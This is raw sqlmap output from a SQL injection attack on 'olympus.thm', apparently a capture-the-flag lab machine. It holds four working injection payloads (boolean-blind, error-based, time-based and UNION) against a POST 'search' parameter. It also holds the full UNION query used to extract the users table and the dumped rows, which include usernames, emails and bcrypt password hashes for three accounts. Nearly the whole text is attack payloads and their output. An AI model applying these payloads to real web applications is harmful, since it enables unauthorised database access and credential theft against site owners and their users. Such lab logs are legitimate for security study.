        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:10:35 /2026-06-02/

[19:10:35] [DEBUG] cleaning up configuration parameters
[19:10:35] [DEBUG] setting the HTTP timeout
[19:10:35] [DEBUG] setting the HTTP User-Agent header
[19:10:35] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:10:35] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/139 Version/16.0 Safari/605.1.15' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:10:35] [DEBUG] creating HTTP requests opener object
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] [19:10:40] [INFO] resuming back-end DBMS 'mysql' 
[19:10:40] [DEBUG] resolving hostname 'olympus.thm'
[19:10:40] [INFO] testing connection to the target URL
[19:10:41] [DEBUG] declared web page charset 'utf-8'
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fr4v90lsk1c...b1l8u7fl21'). Do you want to use those [Y/n] sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search=1337' OR NOT 3318=3318#&submit=
    Vector: OR NOT [INFERENCE]#

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: search=1337' AND EXTRACTVALUE(9521,CONCAT(0x5c,0x7170767a71,(SELECT (ELT(9521=9521,1))),0x716b766a71))-- EThr&submit=
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1337' AND (SELECT 3016 FROM (SELECT(SLEEP(5)))IHpj)-- ojmS&submit=
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: search=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x65546f53547652636e4f65477a4d6f564b666c72506a6776615457646f4f6f417665575864694e6b,0x716b766a71),NULL,NULL,NULL#&submit=
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL#
---
[19:10:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.1
[19:10:41] [INFO] fetching columns for table 'users' in database 'olympus'
[19:10:41] [DEBUG] resuming configuration option 'string' ('result')
[19:10:41] [DEBUG] performed 0 queries in 0.00 seconds
[19:10:41] [INFO] fetching entries for table 'users' in database 'olympus'
[19:10:41] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[19:10:41] [PAYLOAD] 1337' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,JSON_ARRAYAGG(CONCAT_WS(0x667966656b73,IFNULL(CAST(randsalt AS NCHAR),0x20),IFNULL(CAST(user_email AS NCHAR),0x20),IFNULL(CAST(user_firstname AS NCHAR),0x20),IFNULL(CAST(user_id AS NCHAR),0x20),IFNULL(CAST(user_image AS NCHAR),0x20),IFNULL(CAST(user_lastname AS NCHAR),0x20),IFNULL(CAST(user_name AS NCHAR),0x20),IFNULL(CAST(user_password AS NCHAR),0x20),IFNULL(CAST(user_role AS NCHAR),0x20))),0x716b766a71),NULL,NULL,NULL FROM olympus.users#
[19:10:41] [DEBUG] performed 1 query in 0.05 seconds
[19:10:41] [DEBUG] analyzing table dump for possible password hashes
Database: olympus
Table: users
[3 entries]
+---------+----------+------------+-----------+------------------------+------------+---------------+--------------------------------------------------------------+----------------+
| user_id | randsalt | user_name  | user_role | user_email             | user_image | user_lastname | user_password                                                | user_firstname |
+---------+----------+------------+-----------+------------------------+------------+---------------+--------------------------------------------------------------+----------------+
| 3       | <blank>  | prometheus | User      | prometheus@olympus.thm | <blank>    | <blank>       | $2y$10$YC6uoMwK9VpB5QL513vfLu1RV2sgBf01c0lzPHcz1qK2EArDvnj3C | prometheus     |
| 6       | dgas     | root       | Admin     | root@chat.olympus.thm  | <blank>    | <blank>       | $2y$10$lcs4XWc5yjVNsMb4CUBGJevEkIuWdZN3rsuKWHCc.FGtapBAfW.mK | root           |
| 7       | dgas     | zeus       | User      | zeus@chat.olympus.thm  | <blank>    | <blank>       | $2y$10$cpJKDXh2wlAI5KlCsUaLCOnf0g5fiG0QSUS53zp/r0HMtaj6rT4lC | zeus           |
+---------+----------+------------+-----------+------------------------+------------+---------------+--------------------------------------------------------------+----------------+

[19:10:41] [INFO] table 'olympus.users' dumped to CSV file '/home/tomc/.local/share/sqlmap/output/olympus.thm/dump/olympus/users.csv'
[19:10:41] [INFO] fetched data logged to text files under '/home/tomc/.local/share/sqlmap/output/olympus.thm'

[*] ending @ 19:10:41 /2026-06-02/

